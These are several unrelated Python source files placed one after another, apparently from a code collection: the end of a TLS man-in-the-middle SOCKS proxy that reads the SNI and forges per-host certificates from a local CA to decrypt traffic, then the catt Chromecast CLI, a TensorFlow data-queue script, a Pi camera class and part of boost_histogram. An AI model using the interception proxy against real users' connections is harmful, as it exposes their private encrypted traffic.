self.crecv(vcompression_method_len)
# Extensions, this is what we're looking for
ext_len, = struct.unpack("!H", self.crecv(2))
assert hlength >= ext_len # Impossible to be shorter
sni=b''
while ext_len > 0:
ext_len -= 4
assert ext_len >= 0
etype, elength = struct.unpack("!HH", self.crecv(4))
ext_len -= elength
assert ext_len >= 0 # Impossible to be shorter
buf = self.crecv(elength)
off = 0
if etype == 0: # Extension::type == ExtensionType::server_name
sllen, = struct.unpack("!H", buf[off:off+2])
off += 2
while sllen > 0:
stype = ord(buf[off:off+1])
off += 1
slen, = struct.unpack("!H", buf[off:off+2])
off += 2
if slen == 0:
continue
name = buf[off:off+slen]
off += slen
if stype == 0: # ServerName::name_type, 0 = host_name
sni = name
break
name = None
break
assert sni
sni = sni.decode()
except:
logging.info(f'{self.id}: Couldn\'t extract SNI, assuming plain connection')
pipe_sockets(self.sdirect, self.connection, self.data, logprefix=f'{self.id}: client <=> remote: ')
self.data = None
return
logging.info(f'{self.id}: Got SNI: {sni}')
self.sdirect.close()
# Create certificate
with CA.get(sni) as crt:
sa, sb = socket.socketpair()
try:
t1 = threading.Thread(target=pipe_sockets, args=(sa, self.connection, self.data, None, f'{self.id}: client <=> mitm ssl in: '))
self.data = None
t1.daemon = True
t1.start()
with crt.context.wrap_socket(sb, server_side=True) as ssock:
s = self.mksocket(args.tls_via)
self.rconnect(s, args.via, sni)
pipe_sockets(s, ssock, logprefix=f'{self.id}: mitm decrypted out <=> remote: ')
finally:
sb.close()
if t1:
kill_thread(t1)
sa.close()
def cleanup(self):
if self.sdirect:
self.sdirect.close()
if __name__ == '__main__':
logging.root.setLevel(logging.NOTSET)
setprocname(__file__)
parser = argparse.ArgumentParser(description='socks plain to tls proxy', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-l', '--listen', type=str2ipport('0.0.0.0',1666, False), help='IP:PORT to listen on', default='0.0.0.0:1666')
parser.add_argument('-c', '--via', type=str2ipport(), help='IP:PORT of socks proxy to connect to for undecryptable traffic, or "direct" for none', default='127.0.0.1:2666')
parser.add_argument('-t', '--tls-via', type=str2ipport(), help='IP:PORT of socks proxy to connect to for decrypted traffic', default='127.0.0.1:3666')
parser.add_argument('--ca', default="/etc/ssl/CA/CA.pem")
parser.add_argument('--ca-key', default="/etc/ssl/CA/CA.key")
args = parser.parse_args()
CA = CertGen(args.ca, args.ca_key)
with ThreadingTCPServer(args.listen, TLSStripper) as server:
server.serve_forever()
|
cli.py
|
# -*- coding: utf-8 -*-
import configparser
import random
import sys
import time
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
import click
from . import __codename__
from . import __version__
from .controllers import CastState
from .controllers import setup_cast
from .controllers import StateFileError
from .controllers import StateMode
from .discovery import cast_device_ip_exists
from .discovery import get_cast_devices_info
from .error import CastError
from .error import CattUserError
from .error import CliError
from .http_server import serve_file
from .subs_info import SubsInfo
from .util import echo_json
from .util import echo_status
from .util import echo_warning
from .util import hunt_subtitles
from .util import is_ipaddress
CONFIG_DIR = Path(click.get_app_dir("catt"))
CONFIG_PATH = Path(CONFIG_DIR, "catt.cfg")
STATE_PATH = Path(CONFIG_DIR, "state.json")
WAIT_PLAY_TIMEOUT = 30
class CattTimeParamType(click.ParamType):
def convert(self, value, param, ctx):
try:
tdesc = [int(x) for x in value.split(":")]
tlen = len(tdesc)
if (tlen > 1 and any(t > 59 for t in tdesc)) or tlen > 3:
raise ValueError
except ValueError:
self.fail("{} is not a valid time description.".format(value))
tdesc.reverse()
return sum(tdesc[p] * 60 ** p for p in range(tlen))
CATT_TIME = CattTimeParamType()
class YtdlOptParamType(click.ParamType):
def convert(self, value, param, ctx):
if "=" not in value:
self.fail("{} is not a valid key/value pair.".format(value))
ykey, yval = value.split("=", 1)
yval = {"true": True, "false": False}.get(yval.lower().strip(), yval)
return (ykey, yval)
YTDL_OPT = YtdlOptParamType()
def process_url(ctx, param, value: str):
if value == "-":
stdin_text = click.get_text_stream("stdin")
if not stdin_text.isatty():
value = stdin_text.read().strip()
else:
raise CliError("No input received from stdin")
if "://" not in value:
if ctx.info_name != "cast":
raise CliError("Local file not allowed as argument to this command")
if not Path(value).is_file():
raise CliError("The chosen file does not exist")
return value
def process_path(ctx, param, value):
path = Path(value) if value else None
if path and (path.is_dir() or not path.parent.exists()):
raise CliError("The specified path is invalid")
return path
def process_subtitles(ctx, param, value):
if not value:
return None
pval = urlparse(value).path if "://" in value else value
if not pval.lower().endswith((".srt", ".vtt")):
raise CliError("Invalid subtitles format, only srt and vtt are supported")
if "://" not in value and not Path(value).is_file():
raise CliError("Subtitles file [{}] does not exist".format(value))
return value
def process_device(device_desc, aliases):
"""
Resolve real device name when value is an alias.
:param device_desc: Can be an ip-address or a name (alias or real name).
:type device_desc: str
:param aliases: Dictionary of device aliases and their corresponding real names.
:type aliases: Dict[str, str]
"""
if is_ipaddress(device_desc):
return device_desc
else:
if device_desc:
device_desc = device_desc.lower()
return aliases.get(device_desc, device_desc)
def fail_if_no_ip(ipaddr):
if not ipaddr:
raise CliError("Local IP-address could not be determined")
def create_server_thread(filename, address, port, content_type, single_req=False):
thr = Thread(target=serve_file, args=(filename, address, port, content_type, single_req))
thr.setDaemon(True)
thr.start()
return thr
CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])
@click.group(context_settings=CONTEXT_SETTINGS)
@click.option("-d", "--device", metavar="NAME_OR_IP", help="Select Chromecast device.")
@click.version_option(
version=__version__,
prog_name="catt",
message="%(prog)s v%(version)s, " + __codename__ + ".",
)
@click.pass_context
def cli(ctx, device):
device_from_config = ctx.obj["options"].get("device")
ctx.obj["selected_device"] = process_device(device or device_from_config, ctx.obj["aliases"])
ctx.obj["selected_device_is_from_cli"] = bool(device)
@cli.command(short_help="Send a video to a Chromecast for playing.")
@click.argument("video_url", callback=process_url)
@click.option(
"-s",
"--subtitles",
callback=process_subtitles,
metavar="SUB",
help="Specify a subtitles file.",
)
@click.option(
"-f",
"--force-default",
is_flag=True,
help="Force use of the default Chromecast app (use if a custom app doesn't work).",
)
@click.option(
"-r",
"--random-play",
is_flag=True,
help="Play random item from playlist, if applicable.",
)
@click.option(
"--no-subs",
is_flag=True,
default=False,
help="Don't try to load subtitles automatically from the local folder.",
)
@click.option(
"-n",
"--no-playlist",
is_flag=True,
help="Play only video, if url contains both video and playlist ids.",
)
@click.option(
"-y",
"--ytdl-option",
type=YTDL_OPT,
multiple=True,
metavar="OPT",
help="yt-dlp option. "
"Should be passed as `-y option=value`, and can be specified multiple times (implies --force-default).",
)
@click.option(
"-t",
"--seek-to",
type=CATT_TIME,
metavar="TIME",
help="Start playback at specific timestamp.",
)
@click.option(
"-b",
"--block",
is_flag=True,
help="Keep catt process alive until playback has ended. "
"Only useful when casting remote files, as catt is already running a server when casting local files. "
"Currently exits after playback of single media, so not useful with playlists yet.",
)
@click.pass_obj
def cast(
settings,
video_url: str,
subtitles,
force_default: bool,
random_play: bool,
no_subs: bool,
no_playlist: bool,
ytdl_option,
seek_to: str,
block: bool = False,
):
controller = "default" if force_default or ytdl_option else None
playlist_playback = False
st_thr = su_thr = subs = None
cst, stream = setup_cast(
settings["selected_device"],
video_url=video_url,
prep="app",
controller=controller,
ytdl_options=ytdl_option,
)
media_is_image = stream.guessed_content_category == "image"
local_or_remote = "local" if stream.is_local_file else "remote"
if stream.is_local_file:
fail_if_no_ip(stream.local_ip)
st_thr = create_server_thread(
video_url,
stream.local_ip,
stream.port,
stream.guessed_content_type,
single_req=media_is_image,
)
elif stream.is_playlist and not (no_playlist and stream.video_id):
if stream.playlist_length == 0:
cst.kill(idle_only=True)
raise CliError("Playlist is empty")
if not random_play and cst.playlist_capability and stream.playlist_all_ids:
playlist_playback = True
else:
if random_play:
entry = random.randrange(0, stream.playlist_length)
else:
echo_warning("Playlist playback not possible, playing first video")
entry = 0
stream.set_playlist_entry(entry)
if playlist_playback:
click.echo("Casting remote playlist {}...".format(video_url))
video_id = stream.video_id or stream.playlist_all_ids[0]
cst.play_playlist(stream.playlist_id, video_id=video_id)
else:
if not subtitles and not no_subs and stream.is_local_file:
subtitles = hunt_subtitles(video_url)
if subtitles:
fail_if_no_ip(stream.local_ip)
subs = SubsInfo(subtitles, stream.local_ip, stream.port + 1)
su_thr = create_server_thread(
subs.file,
subs.local_ip,
subs.port,
"text/vtt;charset=utf-8",
single_req=True,
)
click.echo("Casting {} file {}...".format(local_or_remote, video_url))
click.echo(
'{} "{}" on "{}"...'.format(
"Showing" if media_is_image else "Playing",
stream.video_title,
cst.cc_name,
)
)
if cst.info_type == "url":
cst.play_media_url(
stream.video_url,
title=stream.video_title,
content_type=stream.guessed_content_type,
subtitles=subs.url if subs else None,
thumb=stream.video_thumbnail,
current_time=seek_to,
)
elif cst.info_type == "id":
cst.play_media_id(stream.video_id, current_time=seek_to)
else:
raise ValueError("Invalid or undefined info type")
if stream.is_local_file or subs:
click.echo("Serving local file(s).")
if not media_is_image and (stream.is_local_file or block):
if not cst.wait_for(["PLAYING"], timeout=WAIT_PLAY_TIMEOUT):
raise CliError("Playback of {} file has failed".format(local_or_remote))
cst.wait_for(["UNKNOWN", "IDLE"])
elif (stream.is_local_file and media_is_image) or subs:
while (st_thr and st_thr.is_alive()) or (su_thr and su_thr.is_alive()):
time.sleep(1)
@cli.command("cast_site", short_help="Cast any website to a Chromecast.")
@click.argument("url", callback=process_url)
@click.pass_obj
def cast_site(settings, url):
cst = setup_cast(
settings["selected_device"],
controller="dashcast",
action="load_url",
prep="app",
)
click.echo('Casting {} on "{}"...'.format(url, cst.cc_name))
cst.load_url(url)
@cli.command(short_help="Add a video to the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.option(
"-n",
"--play-next",
is_flag=True,
help="Add video immediately after currently playing video.",
)
@click.pass_obj
def add(settings, video_url, play_next):
cst, stream = setup_cast(settings["selected_device"], video_url=video_url, action="add", prep="control")
if cst.name != stream.extractor or not (stream.is_remote_file or stream.is_playlist_with_active_entry):
raise CliError("This url cannot be added to the queue")
click.echo('Adding video id "{}" to the queue.'.format(stream.video_id))
if play_next:
cst.add_next(stream.video_id)
else:
cst.add(stream.video_id)
@cli.command(short_help="Remove a video from the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.pass_obj
def remove(settings, video_url):
cst, stream = setup_cast(
settings["selected_device"],
video_url=video_url,
action="remove",
prep="control",
)
if cst.name != stream.extractor or not stream.is_remote_file:
raise CliError("This url cannot be removed from the queue")
click.echo('Removing video id "{}" from the queue.'.format(stream.video_id))
cst.remove(stream.video_id)
@cli.command(short_help="Clear the queue (YouTube only).")
@click.pass_obj
def clear(settings):
cst = setup_cast(settings["selected_device"], action="clear", prep="control")
cst.clear()
@cli.command(short_help="Pause a video.")
@click.pass_obj
def pause(settings):
cst = setup_cast(settings["selected_device"], action="pause", prep="control")
cst.pause()
@cli.command(short_help="Resume a video after it has been paused.")
@click.pass_obj
def play(settings):
cst = setup_cast(settings["selected_device"], action="play", prep="control")
cst.play()
@cli.command("play_toggle", short_help="Toggle between playing and paused state.")
@click.pass_obj
def play_toggle(settings):
cst = setup_cast(settings["selected_device"], action="play_toggle", prep="control")
cst.play_toggle()
@cli.command(short_help="Stop playing.")
@click.option(
"-f",
"--force",
is_flag=True,
help="Launch dummy chromecast app before sending stop command "
"(for devices that do not respond to stop command under certain circumstances).",
)
@click.pass_obj
def stop(settings, force):
cst = setup_cast(settings["selected_device"])
cst.kill(force=force)
@cli.command(short_help="Rewind a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def rewind(settings, timedesc):
cst = setup_cast(settings["selected_device"], action="rewind", prep="control")
cst.rewind(timedesc)
@cli.command(short_help="Fastforward a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def ffwd(settings, timedesc):
cst = setup_cast(settings["selected_device"], action="ffwd", prep="control")
cst.ffwd(timedesc)
@cli.command(short_help="Seek the video to TIME position.")
@click.argument("timedesc", type=CATT_TIME, metavar="TIME")
@click.pass_obj
def seek(settings, timedesc):
cst = setup_cast(settings["selected_device"], action="seek", prep="control")
cst.seek(timedesc)
@cli.command(short_help="Skip to end of content.")
@click.pass_obj
def skip(settings):
cst = setup_cast(settings["selected_device"], action="skip", prep="control")
cst.skip()
@cli.command(short_help="Set the volume to LVL [0-100].")
@click.argument("level", type=click.IntRange(0, 100), metavar="LVL")
@click.pass_obj
def volume(settings, level):
cst = setup_cast(settings["selected_device"])
cst.volume(level / 100.0)
@cli.command(short_help="Turn up volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumeup(settings, delta):
cst = setup_cast(settings["selected_device"])
cst.volumeup(delta / 100.0)
@cli.command(short_help="Turn down volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumedown(settings, delta):
cst = setup_cast(settings["selected_device"])
cst.volumedown(delta / 100.0)
@cli.command(short_help="Show some information about the currently-playing video.")
@click.pass_obj
def status(settings):
cst = setup_cast(settings["selected_device"], prep="info")
echo_status(cst.cast_info)
@cli.command(short_help="Show complete information about the currently-playing video.")
@click.option("-j", "--json-output", is_flag=True, help="Output info as json.")
@click.pass_obj
def info(settings, json_output):
try:
cst = setup_cast(settings["selected_device"], prep="info")
except CastError:
if json_output:
info = {}
else:
raise
else:
info = cst.info
if json_output:
echo_json(info)
else:
for (key, value) in info.items():
click.echo("{}: {}".format(key, value))
@cli.command(short_help="Scan the local network and show all Chromecasts and their IPs.")
@click.option("-j", "--json-output", is_flag=True, help="Output scan result as json.")
def scan(json_output):
if not json_output:
click.echo("Scanning Chromecasts...")
devices = get_cast_devices_info()
if json_output:
echo_json(devices)
else:
if not devices:
raise CastError("No devices found")
for device in devices.keys():
click.echo("{ip} - {device} - {manufacturer} {model_name}".format(device=device, **devices[device]))
@cli.command(short_help="Save the current state of the Chromecast for later use.")
@click.argument("path", type=click.Path(writable=True), callback=process_path, required=False)
@click.pass_obj
def save(settings, path):
cst = setup_cast(settings["selected_device"], prep="control")
if not cst.save_capability or cst.is_streaming_local_file:
raise CliError("Saving state of this kind of content is not supported")
elif cst.save_capability == "partial":
echo_warning("Please be advised that playlist data will not be saved")
echo_status(cst.media_info)
if path and path.is_file():
click.confirm("File already exists. Overwrite?", abort=True)
click.echo("Saving...")
if path:
state = CastState(path, StateMode.ARBI)
cc_name = "*"
else:
state = CastState(STATE_PATH, StateMode.CONF)
cc_name = cst.cc_name
state.set_data(cc_name, {"controller": cst.name, "data": cst.media_info})
@cli.command(short_help="Return Chromecast to saved state.")
@click.argument("path", type=click.Path(exists=True), callback=process_path, required=False)
@click.pass_obj
def restore(settings, path):
if not path and not STATE_PATH.is_file():
raise CliError("Save file in config dir has not been created")
cst = setup_cast(settings["selected_device"])
state = CastState(path or STATE_PATH, StateMode.READ)
try:
data = state.get_data(cst.cc_name if not path else None)
except StateFileError:
raise CliError("The chosen file is not a valid save file")
if not data:
raise CliError("No save data found for this device")
echo_status(data["data"])
click.echo("Restoring...")
cst = setup_cast(settings["selected_device"], prep="app", controller=data["controller"])
cst.restore(data["data"])
@cli.command("write_config", short_help='DEPRECATED: Please use "set_default".')
def write_config():
raise CliError('DEPRECATED: Please use "set_default"')
@cli.command("set_default", short_help="Set the selected device as default.")
@click.pass_obj
def set_default(settings):
config = readconfig()
device = get_device_from_settings(settings)
config["options"]["device"] = device
writeconfig(config)
@cli.command("del_default", short_help="Delete the default device.")
@click.pass_obj
def del_default(settings):
config = readconfig()
if "device" not in config["options"]:
raise CliError("No default device is set, so none deleted")
config["options"].pop("device")
writeconfig(config)
@cli.command(
"set_alias",
short_help="Set an alias name for the selected device (case-insensitive).",
)
@click.argument("name")
@click.pass_obj
def set_alias(settings, name):
config = readconfig()
device = get_device_from_settings(settings)
old_alias = get_alias_from_config(config, device)
if old_alias:
config["aliases"].pop(old_alias)
config["aliases"][name] = device
writeconfig(config)
@cli.command("del_alias", short_help="Delete the alias name of the selected device.")
@click.pass_obj
def del_alias(settings):
config = readconfig()
device = get_device_from_settings(settings)
alias = get_alias_from_config(config, device)
if not alias:
raise CliError('No alias exists for "{}", so none deleted'.format(device))
config["aliases"].pop(alias)
writeconfig(config)
def get_alias_from_config(config, device):
try:
return next(a for a, d in config["aliases"].items() if d == device)
except StopIteration:
return None
def get_device_from_settings(settings):
device_desc = settings["selected_device"]
if not device_desc or not settings["selected_device_is_from_cli"]:
raise CliError("No device specified (must be explicitly specified with -d option)")
is_ip = is_ipaddress(device_desc)
if is_ip:
found = cast_device_ip_exists(device_desc)
else:
devices = get_cast_devices_info()
found = device_desc in devices.keys()
if not found:
msg = "No device found at {}" if is_ip else 'Specified device "{}" not found'
raise CliError(msg.format(device_desc))
return device_desc
def writeconfig(config):
try:
CONFIG_DIR.mkdir(parents=True)
except FileExistsError:
pass
with CONFIG_PATH.open("w") as configfile:
config.write(configfile)
def readconfig():
config = configparser.ConfigParser()
# ConfigParser.read does not take path-like objects <3.6.
config.read(str(CONFIG_PATH))
for req_section in ("options", "aliases"):
if req_section not in config.sections():
config.add_section(req_section)
return config
def get_config_as_dict():
"""
Returns a dictionary of the form:
{"options": {"key": "value"},
"aliases": {"device1": "device_name"}}
"""
config = readconfig()
return {section: dict(config.items(section)) for section in config.sections()}
def main():
try:
return cli(obj=get_config_as_dict())
except CattUserError as err:
sys.exit("Error: {}.".format(str(err)))
if __name__ == "__main__":
main()
|
CustomRunner.py
|
import tensorflow as tf
import time
import threading
import numpy as np
from tqdm import tqdm
import random
# load data entirely into memory 🙁
name_list = list()
print("Populating name_list")
for i in tqdm(range(25000)):
name_list.append("/home/david/Documents/gameFiles/CSV-19x19/data"+str(i)+".csv")
filename_queue = tf.train.string_input_producer(name_list, shuffle=True)
reader = tf.TextLineReader()
key, value = reader.read(filename_queue)
# Default values, in case of empty columns. Also specifies the type of the
# decoded result.
print("Initialize columns")
columns = [[0] for x in tqdm(range(723))]
#print(columns)
print("Initialize Features")
features = [0 for x in tqdm(range(361))]
#print(features)
columns = tf.decode_csv(value, record_defaults=columns)
#print(columns)
print("Populating features")
features = [columns[x] for x in tqdm(range(361))]
print("Populating solutions")
labels = [columns[x] for x in tqdm(range(362, 723))]
#print(solutions)
trIdx = columns[362]
batch_size = 128
def data_iterator():
""" A simple data iterator """
batch_idx = 0
while True:
# shuffle labels and features
idxs = np.arange(0, len(features))
random.shuffle(idxs)
shuf_features = features[idxs]
shuf_labels = labels[idxs]
for batch_idx in range(0, len(features), batch_size):
images_batch = shuf_features[batch_idx:batch_idx + batch_size] / 255.
images_batch = images_batch.astype("int32")
labels_batch = shuf_labels[batch_idx:batch_idx + batch_size]
yield images_batch, labels_batch
class CustomRunner(object):
"""
This class manages the the background threads needed to fill
a queue full of data.
"""
def __init__(self):
self.dataX = tf.placeholder(dtype=tf.float32, shape=[None, 28*28])
self.dataY = tf.placeholder(dtype=tf.int64, shape=[None, ])
# The actual queue of data. The queue contains a vector for
# the mnist features, and a scalar label.
self.queue = tf.RandomShuffleQueue(shapes=[[28*28], []],
dtypes=[tf.float32, tf.int64],
capacity=2000,
min_after_dequeue=1000)
# The symbolic operation to add data to the queue
# we could do some preprocessing here or do it in numpy. In this example
# we do the scaling in numpy
self.enqueue_op = self.queue.enqueue_many([self.dataX, self.dataY])
def get_inputs(self):
"""
Return's tensors containing a batch of images and labels
"""
images_batch, labels_batch = self.queue.dequeue_many(128)
return images_batch, labels_batch
def thread_main(self, sess):
"""
Function run on alternate thread. Basically, keep adding data to the queue.
"""
for dataX, dataY in data_iterator():
sess.run(self.enqueue_op, feed_dict={self.dataX:dataX, self.dataY:dataY})
def start_threads(self, sess, n_threads=1):
""" Start background threads to feed queue """
threads = []
for n in range(n_threads):
t = threading.Thread(target=self.thread_main, args=(sess,))
t.daemon = True # thread will close when parent quits
t.start()
threads.append(t)
return threads
try:
# Doing anything with data on the CPU is generally a good idea.
with tf.device("/cpu:0"):
custom_runner = CustomRunner()
images_batch, labels_batch = custom_runner.get_inputs()
# simple model
w = tf.get_variable("w1", [28*28, 10])
y_pred = tf.matmul(images_batch, w)
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(y_pred, labels_batch)
# for monitoring
loss_mean = tf.reduce_mean(loss)
train_op = tf.train.AdamOptimizer().minimize(loss)
sess = tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=8))
init = tf.global_variables_initializer()
sess.run(init)
# start the tensorflow QueueRunner's
tf.train.start_queue_runners(sess=sess)
# start our custom queue runner's threads
custom_runner.start_threads(sess)
count = 0
while True:
_, loss_val = sess.run([train_op, loss_mean])
if (count % 100 == 0):
print(loss_val)
count += 1
except TypeError:
print("TE")
quit()
|
camera.py
|
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class Camera(object):
def __init__(self, resolution=(512, 304), framerate=24):
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(
self.rawCapture, format="bgr", use_video_port=True)
self.frame = None
self.stopped = False
def start(self):
# フレームの読み込み処理をスレッドとして開始する
Thread(target=self.update, args=()).start()
return self
def update(self):
# フレームの読み込み処理を行う
for f in self.stream:
self.frame = f.array
self.rawCapture.truncate(0)
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# 最新のフレームを返す
return self.frame
def stop(self):
# スレッドを終了させる
self.stopped = True
|
hist.py
|
import collections.abc
import copy
import logging
import threading
import typing
import warnings
from os import cpu_count
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Iterable,
List,
Mapping,
NewType,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
import numpy as np
import boost_histogram
import boost_histogram._core as _core
from .axestuple import AxesTuple
from .axis import Axis
from .enum import Kind
from .storage import Double, Storage
from .typing import Accumulator, ArrayLike, CppHistogram, SupportsIndex
from .utils import cast, register, set_module
from .view import MeanView, WeightedMeanView, WeightedSumView, _to_view
if TYPE_CHECKING:
from builtins import ellipsis
NOTHING = object()
_histograms: Set[Type[CppHistogram]] = {
_core.hist.any_double,
_core.hist.any_int64,
_core.hist.any_atomic_int64,
_core.hist.any_unlimited,
_core.hist.any_weight,
_core.hist.any_mean,
_core.hist.any_weighted_mean,
}
logger = logging.getLogger(__name__)
CppAxis = NewType("CppAxis", object)
SimpleIndexing = Union[SupportsIndex, slice]
InnerIndexing = Union[SimpleIndexing, Callable[[Axis], int], "ellipsis"]
FullInnerIndexing = Union[InnerIndexing, List[InnerIndexing]]
IndexingWithMapping = Union[FullInnerIndexing, Mapping[int, FullInnerIndexing]]
IndexingExpr = Union[IndexingWithMapping, Tuple[IndexingWithMapping, ...]]
T = TypeVar("T")
def _fill_cast(
value: T, *, inner: bool = False
) -> Union[T, "np.typing.NDArray[Any]", Tuple[T, ...]]:
"""
Convert to NumPy arrays. Some buffer objects do not get converted by forcecast.
If not called by itself (inner=False), then will work through one level of tuple/list.
"""
if value is None or isinstance(value, (str, bytes)):
return value # type: ignore
elif not inner and isinstance(value, (tuple, list)):
return tuple(_fill_cast(a, inner=True) for a in value) # type: ignore
elif hasattr(value, "__iter__") or hasattr(value, "__array__"):
return np.asarray(value)
else:
return value
def _arg_shortcut(item: Union[Tuple[int, float, float], Axis, CppAxis]) -> CppAxis:
if isinstance(item, tuple) and len(item) == 3:
msg = "Developer shortcut: will be removed in a future version"
warnings.warn(msg, FutureWarning)
return _core.axis.regular_uoflow(item[0], item[1], item[2]) # type: ignore
elif isinstance(item, Axis):
return item._ax # type: ignore
else:
raise TypeError("Only axes supported in histogram constructor")
def _expand_ellipsis(indexes: Iterable[Any], rank: int) -> List[Any]:
indexes = list(indexes)
number_ellipses = indexes.count(Ellipsis)
if number_ellipses == 0:
return indexes
elif number_ellipses == 1:
index = indexes.index(Ellipsis)
additional = rank + 1 - len(indexes)
if additional < 0:
raise IndexError("too many indices for histogram")
# Fill out the ellipsis with empty slices
return indexes[:index] + [slice(None)] * additional + indexes[index + 1 :]
else:
raise IndexError("an index can only have a single ellipsis ('...')")
H = TypeVar("H", bound="Histogram")
# We currently do not cast *to* a histogram, but this is consistent
# and could be used later.
@register(_histograms) # type: ignore
@set_module("boost_histogram")
class Histogram:
# Note this is a __slots__ __dict__ class!
__slots__ = (
"_hist",
"axes",
"__dict__",
)
# .metadata and ._variance_known are part of the dict
_family: object = boost_histogram
def __init_subclass__(cls, *, family: Optional[object] = None) -> None:
"""
Sets the family for the histogram. This should be a unique object (such
as the main module of your package) that is consistently set across all
subclasses. When converting back from C++, casting will try to always
pick the best matching family from the loaded subclasses for Axis and
such.
"""
super().__init_subclass__()
cls._family = family if family is not None else object()
@typing.overload
def __init__(self, *args: "Histogram") -> None:
...
@typing.overload
def __init__(self, *args: CppHistogram, metadata: Any = ...) -> None:
...
@typing.overload
def __init__(
self,
*axes: Union[Axis, CppAxis],
storage: Storage = ...,
metadata: Any = ...,
) -> None:
...
def __init__(
self,
*axes: Union[Axis, CppAxis, "Histogram", CppHistogram],
storage: Storage = Double(), # noqa: B008
metadata: Any = None,
) -> None:
"""
Construct a new histogram.
If you pass in a single argument, this will be treated as a
histogram and this will convert the histogram to this type of
histogram.
Parameters
----------
*args : Axis
Provide 1 or more axis instances.
storage : Storage = bh.storage.Double()
Select a storage to use in the histogram
metadata : Any = None
Data that is passed along if a new histogram is created
"""
self._variance_known = True
# Allow construction from a raw histogram object (internal)
if len(axes) == 1 and isinstance(axes[0], tuple(_histograms)):
self._hist: Any = axes[0]
self.metadata = metadata
self.axes = self._generate_axes_()
return
# If we construct with another Histogram as the only positional argument,
# support that too
if len(axes) == 1 and isinstance(axes[0], Histogram):
# Special case - we can recursively call __init__ here
self.__init__(axes[0]._hist) # type: ignore
self._from_histogram_object(axes[0])
return
# Support objects that provide a to_boost method, like Uproot
elif len(axes) == 1 and hasattr(axes[0], "_to_boost_histogram_"):
self.__init__(axes[0]._to_boost_histogram_()) # type: ignore
return
if storage is None:
storage = Double()
self.metadata = metadata
# Check for missed parenthesis or incorrect types
if not isinstance(storage, Storage):
if issubclass(storage, Storage):
raise KeyError(
"Passing in an initialized storage has been removed. Please add ()."
)
else:
raise KeyError("Only storages allowed in storage argument")
# Allow a tuple to represent a regular axis
axes = tuple(_arg_shortcut(arg) for arg in axes) # type: ignore
if len(axes) > _core.hist._axes_limit:
raise IndexError(
f"Too many axes, must be less than {_core.hist._axes_limit}"
)
# Check all available histograms, and if the storage matches, return that one
for h in _histograms:
if isinstance(storage, h._storage_type):
self._hist = h(axes, storage)
self.axes = self._generate_axes_()
return
raise TypeError("Unsupported storage")
def _from_histogram_object(self, other: "Histogram") -> None:
"""
Convert self into a new histogram object based on another, possibly
converting from a different subclass.
"""
self._hist = other._hist
self.__dict__ = copy.copy(other.__dict__)
self.axes = self._generate_axes_()
for ax in self.axes:
ax.__dict__ = copy.copy(ax._ax.metadata)
# Allow custom behavior on either "from" or "to"
other._export_bh_(self)
self._import_bh_()
def _import_bh_(self) -> None:
"""
If any post-processing is needed to pass a histogram between libraries, a
subclass can implement it here. self is the new instance in the current
(converted-to) class.
"""
@classmethod
def _export_bh_(cls, self: "Histogram") -> None:
"""
If any preparation is needed to pass a histogram between libraries, a subclass can
implement it here. cls is the current class being converted from, and self is the
instance in the class being converted to.
"""
def _generate_axes_(self) -> AxesTuple:
"""
This is called to fill in the axes. Subclasses can override it if they need
to change the axes tuple.
"""
return AxesTuple(self._axis(i) for i in range(self.ndim))
def _new_hist(self: H, _hist: CppHistogram, memo: Any = NOTHING) -> H:
"""
Return a new histogram given a new _hist, copying metadata.
"""
other = self.__class__(_hist)
if memo is NOTHING:
other.__dict__ = copy.copy(self.__dict__)
else:
other.__dict__ = copy.deepcopy(self.__dict__, memo)
other.axes = other._generate_axes_()
for ax in other.axes:
if memo is NOTHING:
ax.__dict__ = copy.copy(ax._ax.metadata)
else:
ax.__dict__ = copy.deepcopy(ax._ax.metadata, memo)
return other
@property
def ndim(self) -> int:
"""
Number of axes (dimensions) of the histogram.
"""
return self._hist.rank() # type: ignore
def view(
self, flow: bool = False
) -> Union["np.typing.NDArray[Any]", WeightedSumView, WeightedMeanView, MeanView]:
"""
Return a view into the data, optionally with overflow turned on.
"""
return _to_view(self._hist.view(flow))
def __array__(self) -> "np.typing.NDArray[Any]":
return self.view(False)
def __eq__(self, other: Any) -> bool:
return hasattr(other, "_hist") and self._hist == other._hist
def __ne__(self, other: Any) -> bool:
return (not hasattr(other, "_hist")) or self._hist != other._hist
def __add__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
return result.__iadd__(other)
def __iadd__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
if isinstance(other, (int, float)) and other == 0:
return self
self._compute_inplace_op("__iadd__", other)
# Addition may change the axes if they can grow
self.axes = self._generate_axes_()
return self
def __radd__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self + other
# If these fail, the underlying object throws the correct error
def __mul__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
return result._compute_inplace_op("__imul__", other)
def __rmul__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self * other
def __truediv__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
return result._compute_inplace_op("__itruediv__", other)
def __div__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
